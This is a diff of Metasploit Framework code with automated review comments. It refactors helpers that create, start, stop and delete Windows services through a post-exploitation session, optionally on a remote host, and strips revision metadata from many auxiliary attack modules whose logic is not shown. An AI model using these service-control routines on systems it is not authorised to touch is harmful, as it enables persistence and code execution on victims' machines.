#
# @return [Hash]
#
# @todo Rewrite to allow operating on a remote host
#
def service_info(name)
service = {}
servicekey = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{name.chomp}"
@ -68,6 +149,8 @@ module WindowsServices
# Mode is a string with either auto, manual or disable for the
# corresponding setting. The name of the service is case sensitive.
#
# @todo Rewrite to allow operating on a remote host
#
def service_change_startup(name,mode)
servicekey = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{name.chomp}"
case mode.downcase
@ -81,22 +164,30 @@ module WindowsServices
end
#
# Create a service that runs it's own process.
# Create a service that runs +executable_on_host+ on the session host
#
# It takes as values the service name as string, the display name as
# string, the path of the executable on the host that will execute at
# startup as string and the startup type as an integer of 2 for Auto, 3 for
# Manual or 4 for Disable, default Auto.
# @param name [String] Name of the service to be used as the key
# @param display_name [String] Name of the service as displayed by mmc
# @param executable_on_host [String] EXE on the remote filesystem to
# be used as the service executable
# @param startup [Fixnum] Constant used by CreateServiceA for startup
# type: 2 for Auto, 3 for Manual, 4 for Disable. Default is Auto
# @param server [String,nil] A hostname or IP address. Default is the
# remote localhost
#
# @return [true,false] True if there were no errors, false otherwise
#
def service_create(name, display_name, executable_on_host, startup=2, server=nil)
machine_str = server ? "\\\\#{server}" : nil
adv = session.railgun.advapi32
manag = adv.OpenSCManagerA(machine_str,nil,0x13)
if(manag["return"] != 0)
# SC_MANAGER_CONNECT 0x01
# SC_MANAGER_CREATE_SERVICE 0x02
# SC_MANAGER_QUERY_LOCK_STATUS 0x10
open_sc_manager(:host=>server, :access=>0x13) do |manager|
# SC_HANDLE WINAPI CreateService(
# __in SC_HANDLE hSCManager,
# __in LPCTSTR lpServiceName,
# __in_opt LPCTSTR lpDisplayName,
# __in_opt LPCTSTR lpDisplayName,
# __in DWORD dwDesiredAccess,
# __in DWORD dwServiceType,
# __in DWORD dwStartType,
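Review bot: the new doc block for service_create has `@return [true,false]` but no `@raise`, even though the method now goes through open_sc_manager, which raises RuntimeError when OpenSCManagerA fails. Add an `@raise [RuntimeError]` tag as service_start has. "Default is the remote localhost" in the `server` description is also ambiguous; "the session host", the wording the summary line already uses, would be clearer.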
@ -108,113 +199,112 @@ module WindowsServices
# __in_opt LPCTSTR lpServiceStartName,
# __in_opt LPCTSTR lpPassword
#);
# SC_MANAGER_CREATE_SERVICE = 0x0002
newservice = adv.CreateServiceA(manag["return"],name,display_name,
0x0010,0X00000010,startup,0,executable_on_host,nil,nil,nil,nil,nil)
newservice = adv.CreateServiceA(manager, name, display_name,
0x0010, 0X00000010, startup, 0, executable_on_host,
nil, nil, nil, nil, nil)
adv.CloseServiceHandle(newservice["return"])
adv.CloseServiceHandle(manag["return"])
#SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010
#SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0
if newservice["GetLastError"] == 0
return true
else
return false
end
else
raise "Could not open Service Control Manager, Access Denied"
end
end
#
# Start a service.
#
# Returns 0 if service started, 1 if service is already started and 2 if
# service is disabled.
# @param name [String] Service name (not display name)
# @param server [String,nil] A hostname or IP address. Default is the
# remote localhost
#
# @return [Fixnum] 0 if service started successfully, 1 if it failed
# because the service is already running, 2 if it is disabled
#
# @raise [RuntimeError] if OpenServiceA failed
#
def service_start(name, server=nil)
machine_str = server ? "\\\\#{server}" : nil
adv = session.railgun.advapi32
manag = adv.OpenSCManagerA(machine_str,nil,1)
if(manag["return"] == 0)
raise "Could not open Service Control Manager, Access Denied"
end
#open with SERVICE_START (0x0010)
servhandleret = adv.OpenServiceA(manag["return"],name,0x10)
if(servhandleret["return"] == 0)
adv.CloseServiceHandle(manag["return"])
raise "Could not Open Service, Access Denied"
end
retval = adv.StartServiceA(servhandleret["return"],0,nil)
adv.CloseServiceHandle(servhandleret["return"])
adv.CloseServiceHandle(manag["return"])
if retval["GetLastError"] == 0
return 0
elsif retval["GetLastError"] == 1056
return 1
elsif retval["GetLastError"] == 1058
return 2
open_sc_manager(:host=>server, :access=>1) do |manager|
# SC_HANDLE WINAPI OpenService(
# _In_ SC_HANDLE hSCManager,
# _In_ LPCTSTR lpServiceName,
# _In_ DWORD dwDesiredAccess
# );
# open with access SERVICE_START (0x0010)
handle = adv.OpenServiceA(manager, name, 0x10)
if(handle["return"] == 0)
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
end
retval = adv.StartServiceA(handle["return"],0,nil)
adv.CloseServiceHandle(handle["return"])
# This is terrible. Magic return values should be refactored to
# something meaningful.
case retval["GetLastError"]
when 0; return 0 # everything worked
when 1056; return 1 # service already started
when 1058; return 2 # service disabled
end
end
end
#
# Stop a service.
#
# Returns 0 if service is stopped successfully, 1 if service is already
# stopped or disabled and 2 if the service can not be stopped.
# @param (see #service_start)
# @return [Fixnum] 0 if service stopped successfully, 1 if it failed
# because the service is already stopped or disabled, 2 if it
# cannot be stopped for some other reason.
#
# @raise (see #service_start)
#
def service_stop(name, server=nil)
machine_str = server ? "\\\\#{server}" : nil
adv = session.railgun.advapi32
manag = adv.OpenSCManagerA(machine_str,nil,1)
if(manag["return"] == 0)
raise "Could not open Service Control Manager, Access Denied"
end
#open with SERVICE_STOP (0x0020)
servhandleret = adv.OpenServiceA(manag["return"],name,0x30)
if(servhandleret["return"] == 0)
adv.CloseServiceHandle(manag["return"])
raise "Could not Open Service, Access Denied"
end
retval = adv.ControlService(servhandleret["return"],1,56)
adv.CloseServiceHandle(servhandleret["return"])
adv.CloseServiceHandle(manag["return"])
if retval["GetLastError"] == 0
return 0
elsif retval["GetLastError"] == 1062
return 1
elsif retval["GetLastError"] == 1052
return 2
# SC_MANAGER_SERVICE_STOP (0x0020)
open_sc_manager(:host=>server, :access=>1) do |manager|
# open with SERVICE_STOP (0x0020)
handle = adv.OpenServiceA(manager, name, 0x20)
if(handle["return"] == 0)
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
end
retval = adv.ControlService(handle["return"],1,56)
adv.CloseServiceHandle(handle["return"])
case retval["GetLastError"]
when 0; return 0 # worked
when 1062; return 1 # already stopped or disabled
when 1052; return 2 # cannot be stopped
end
end
end
#
# Delete a service.
#
# @param (see #service_start)
#
def service_delete(name, server=nil)
machine_str = server ? "\\\\#{server}" : nil
adv = session.railgun.advapi32
# #define SC_MANAGER_ALL_ACCESS 0xF003F
manag = adv.OpenSCManagerA(machine_str,nil,0xF003F)
if (manag["return"] == 0)
raise "Could not open Service Control Manager, Access Denied"
open_sc_manager(:host=>server) do |manager|
# Now to grab a handle to the service.
# Thank you, Wine project for defining the DELETE constant since it,
# and all its friends, are missing from the MSDN docs.
# #define DELETE 0x00010000
handle = adv.OpenServiceA(manager, name, 0x10000)
if (handle["return"] == 0)
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
end
# Lastly, delete it
adv.DeleteService(handle["return"])
adv.CloseServiceHandle(handle["return"])
handle["GetLastError"]
end
# Now to grab a handle to the service.
# Thank you, Wine project for defining the DELETE constant since it,
# and all its friends, are missing from the MSDN docs.
# #define DELETE 0x00010000
servhandleret = adv.OpenServiceA(manag["return"],name,0x10000)
if (servhandleret["return"] == 0)
adv.CloseServiceHandle(manag["return"])
raise "Could not Open Service, Access Denied"
end
# Lastly, delete it
adv.DeleteService(servhandleret["return"])
adv.CloseServiceHandle(manag["return"])
adv.CloseServiceHandle(servhandleret["return"])
end
end
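Review bot: in service_delete the block ends with `handle["GetLastError"]`, which is the error recorded by OpenServiceA. The hash returned by `adv.DeleteService` is discarded, so a failed delete is indistinguishable from a successful one. Capture the DeleteService result and return or raise on that instead. service_delete also calls open_sc_manager with its default 0xF003F mask, while service_start and service_stop reach OpenServiceA with `:access=>1`; the same mask should do here. In service_start and service_stop the `case retval["GetLastError"]` has no else branch, so any other error code returns nil despite the documented `@return [Fixnum]`. The `# SC_MANAGER_SERVICE_STOP (0x0020)` comment in service_stop does not match the `:access=>1` on the line below it. In service_create, `newservice["return"]` is closed before it is checked and success is inferred from `GetLastError == 0`; testing `newservice["return"] != 0` first is the more reliable check.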

View File

@ -10,7 +10,7 @@ module Windows
# http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html
module ShadowCopy
include Msf::Post::Windows::WindowsServices
include Msf::Post::Windows::Services
#
# Get the device name for the shadow copy, which is used when accessing
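Review bot: the include changes from Msf::Post::Windows::WindowsServices to Msf::Post::Windows::Services, so any module or script outside this change that still includes the old constant will fail to load with a NameError. If the rename is intended, keep a deprecated alias under the old name for a transition period and mention the rename in the commit message.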

View File

@ -6,7 +6,7 @@ module Scripts
module Meterpreter
module Common
include ::Msf::Post::Windows::WindowsServices
include ::Msf::Post::Windows::Services
end
end

View File

@ -124,7 +124,7 @@ module PacketFu
attr_accessor :eth_header, :ip_header, :icmp_header
def self.can_parse?(str)
return false unless str.size >= 54
return false unless str.size >= 38
return false unless EthPacket.can_parse? str
return false unless IPPacket.can_parse? str
return false unless str[23,1] == "\x01"
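Review bot: the minimum length in can_parse? changes from 54 to 38 with no comment saying where 38 comes from. If it is 14 bytes of Ethernet plus a 20-byte IPv4 header plus the 4 fixed bytes of the ICMP header, say so next to the constant. A spec that parses a packet of exactly that length would keep the bound from drifting again.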

View File

@ -35,6 +35,26 @@ class Def_netapi32
["DWORD","resume_handle","inout"]
])
dll.add_function('NetWkstaUserEnum', 'DWORD', [
["PWCHAR","servername","in"],
["DWORD","level","in"],
["PDWORD","bufptr","out"],
["DWORD","prefmaxlen","in"],
["PDWORD","entriesread","out"],
["PDWORD","totalentries","out"],
["DWORD","resume_handle","inout"]
])
dll.add_function('NetUserGetGroups', 'DWORD', [
["PWCHAR","servername","in"],
["PWCHAR","username","in"],
["DWORD","level","in"],
["PDWORD","bufptr","out"],
["DWORD","prefmaxlen","in"],
["PDWORD","entriesread","out"],
["PDWORD","totalentries","out"]
])
return dll
end
@ -42,4 +62,3 @@ end
end; end; end; end; end; end; end

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary
configuration changes (such as resetting the password) as administrators.
},
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'Author' =>
[
'hkm [at] hakim.ws', #Initial discovery, poc

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'hdm', 'Unknown' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2005-2611'],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '17627' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 Unauthorized Password Change',
'Version' => '$Revision$',
'Description' => %q{
This module exploits an authentication bypass issue which allows arbitrary
password change requests to be issued for any user in the local store.

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '19680' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-0795' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -31,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary
['OSVDB', '60035'],
],
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Version' => '$Revision$'
'License' => MSF_LICENSE
))
register_options([

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -34,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '65533'],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'ContentKeeper Web Appliance mimencode File Access',
'Version' => '$Revision$',
'Description' => %q{
This module abuses the 'mimencode' binary present within
ContentKeeper Web filtering appliances to retrieve arbitrary

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '5798' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'Iomega StorCenter Pro NAS Web Authentication Bypass',
'Version' => '$Revision$',
'Description' => %q{
The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,
allowing for simple brute force attacks to bypass authentication and gain administrative

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'Tomcat Administration Tool Default Access',
'Version' => '$Revision$',
'Description' => 'Detect the Tomcat administration interface.',
'References' =>
[

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'Tomcat UTF-8 Directory Traversal Vulnerability',
'Version' => '$Revision$',
'Description' => %q{
This module tests whether a directory traversal vulnerablity is present
in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'TrendMicro Data Loss Prevention 5.5 Directory Traversal',
'Version' => '$Revision$',
'Description' => %q{
This module tests whether a directory traversal vulnerablity is present
in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294.

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -19,7 +15,6 @@ class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'TYPO3 sa-2009-001 Weak Encryption Key File Disclosure',
'Version' => '$Revision$',
'Description' => %q{
This module exploits a flaw in TYPO3 encryption ey creation process to allow for
file disclosure in the jumpUrl mechanism. This flaw can be used to read any file

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '52048'],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'TYPO3 sa-2010-020 Remote File Disclosure',
'Version' => '$Revision$',
'Description' => %q{
This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes.
Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0.

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -19,7 +15,6 @@ class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'TYPO3 Winstaller default Encryption Keys',
'Version' => '$Revision$',
'Description' => %q{
This module exploits known default encryption keys found in the TYPO3 Winstaller.
This flaw allows for file disclosure in the jumpUrl mechanism. This issue can be

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '40210' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => 'kris katterjohn',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' => [
[ 'CVE', '2004-1550' ],
[ 'OSVDB', '10232' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'MSB', 'MS08-059' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary
supplied.
},
'Author' => [ 'Carlos Perez <carlos_perez [at] darkoperator.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
'License' => MSF_LICENSE
))
end

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'tebo <tebo[at]attackresearch.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# Author: Robin Wood <robin@digininja.org> <http://www.digininja.org>
# Version: 0.1
@ -38,7 +34,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'Robin Wood <robin[at]digininja.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.digininja.org/metasploit/mssql_idf.php' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'tebo <tebo [at] attackresearch [dot] com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.attackresearch.com' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'https://cisecurity.org/benchmarks.html' ]

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -25,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary
against a MySQL instance given the appropriate credentials.
},
'Author' => [ 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
'License' => MSF_LICENSE
))
register_options(

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access',
'Version' => '$Revision$',
'Description' => %q{
This module tests for directory traversal vulnerability in the UpdateAgent
function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -29,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'Sh2kerr <research[ad]dsecrg.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'https://www.metasploit.com/users/mc' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary
run.
},
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
'License' => MSF_LICENSE
))
end

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-5448' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2009-1977' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-0904' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'https://www.metasploit.com/users/mc' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'CG' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.argeniss.com/research/oraclesqlinj.zip' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'https://www.metasploit.com/users/mc' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => ['MC'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'DisclosureDate' => 'Feb 1 2009'
))

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '368' ],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -31,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'URL', 'http://michaeldaw.org/sql-injection-cheat-sheet#postgres' ]
],
'Version' => '$Revision$'
]
))
register_options(

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -28,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'URL', 'www.postgresql.org' ]
],
'Version' => '$Revision$'
]
))
#register_options( [ ], self.class) # None needed.

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'SAP Management Console OSExecute',
'Version' => '$Revision$',
'Description' => %q{
This module allows execution of operating system commands through the SAP
Management Console SOAP Interface. A valid username and password must be

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'Luigi Auriemma', 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2011-1566'],

View File

@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
],
'Version' => '$Revision$',
'DisclosureDate' => 'Apr 5 2012'
))
register_options(

View File

@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
],
'Version' => '$Revision$',
'DisclosureDate'=> 'Jan 19 2012'
))

View File

@ -35,7 +35,6 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
],
'Version' => '$Revision$',
'DisclosureDate' => 'Apr 5 2012'
))

View File

@ -34,7 +34,6 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
],
'Version' => '$Revision$',
'DisclosureDate' => 'Jan 19 2012'))
register_options(

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -32,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'toto' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-6507' ],

View File

@ -1,7 +1,3 @@
##
